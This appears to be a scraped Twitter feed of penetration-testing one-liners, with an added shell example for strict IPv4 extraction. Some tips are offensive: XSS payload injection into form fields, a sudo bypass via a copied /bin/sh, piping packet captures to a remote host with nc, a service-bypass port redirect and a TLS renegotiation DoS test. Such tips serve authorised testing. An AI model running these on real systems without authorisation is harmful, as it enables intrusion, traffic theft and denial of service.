
Pentest CLI Fu
@pentestcli
Command-Line Fu for Penetration Testers. One-liners that might save you some time breaking people's stuff. Suggestions to @pentestcli or @marcwickenden
console> for (i=0;i<document.forms[0].elements.length;i++) { document.forms[0].elements[i].value='<script>alert('+i+')</script>'; } #testxss
Hacky quick and dirty HTTPS server: python -m SimpleHTTPServer & ncat --ssl -l 8443 --sh-exec "ncat 127.0.0.1 8000" --keep-open
Increment over string to generate fuzz list in #ruby: str = 'somestring'; a = ''; str.each_char {|b| a << b; puts a }
Avoiding sudo regex interactive restrictions: cp /bin/sh /tmp/foo; sudo /tmp/foo
@pentestcli nc -lvp 9999 | tcpdump -XX -vvv -r - # Pass traffic FROM a raw tcp socket back into tcpdump for rendering/parsing
@pentestcli tcpdump -w - | nc -v 8.8.8.8 9999 # sniff traffic with tcpdump and write raw capture data to a remote tcp socket
@pentestcli wget example.com/file.txt -O - # Use wget to write to stdout instead of a file if CURL isn't available
@pentestcli grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' # Basic regex for pulling IP addresses from a file or stdout
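The quick regex above is the right first reach, but it also matches junk such as 999.999.999.999 and the first four octets of a longer dotted string like 1.2.3.4.5. The function below is an added example (not from @pentestcli or any of the quoted accounts) that keeps to portable tr/grep/awk and rejects both cases; the sample log line is constructed for the demo.

```shell
#!/bin/sh
# Added example: stricter IPv4 extraction than the one-liner above.
# Strategy: turn every character that is not a digit, a dot or a newline
# into a newline, so each candidate becomes its own token; then require
# the whole token (grep -x) to be exactly four 1-3 digit groups, and let
# awk drop any octet above 255.

extract_ipv4() {
    tr -c '0-9.\n' '\n' |
    grep -E -x '[0-9]{1,3}(\.[0-9]{1,3}){3}' |
    awk -F. '$1<=255 && $2<=255 && $3<=255 && $4<=255' |
    sort -u
}

# Constructed sample input (not real traffic): one bogus octet, one
# five-group string, one host:port pair and a duplicate.
demo_ipv4() {
    printf 'src=10.0.0.1 dst=999.1.1.1 x=1.2.3.4.5 host 192.168.1.10:443 and 10.0.0.1\n' |
    extract_ipv4
}

demo_ipv4
```

On GNU systems swap `sort -u` for `sort -u -V` to get the per-octet ordering mentioned further down this page; plain `sort` is used here so the function also runs on BSD/macOS userland.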
@zyx2k @pentestcli ps aux | grep [p]rocessname | sed s/`whoami`[^0-9]*// | cut -d " " -f 1 :)
Use irb to update a host in #msfconsole: `framework.db.report_host(:host=>"X.X.X.X",:info=>"Cool")` cc: @pentestcli @metasploit
RT @hdmoore GNU sort can order input by IPv4 address using -V or --version-sort < This is awesome! CC @climagic @pentestcli
"@bonsaiviking: @pentestcli #Perl perl -e 'printf "%.8i\n", $_ for (0..99999999)'" < in perl too :-)
#ruby to print out all 8 digit numbers: ruby -e '(00000000..99999999).each {|x| puts "%.8i" % x}'
Make XML human-readable: xmllint --format --encode utf-8 document.xml
@pentestcli ssh user@host "cat file.tar.gz" > file.tar.gz # transfer files through ssh when sftp is disabled
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444 # internal port redirect to bypass services (cc. @pentestcli)
Quick test for SSL/TLS Renegotiation DoS - echo -e "HEAD / HTTP/1.0\r\nR" | openssl s_client -connect ip:port @pentestcli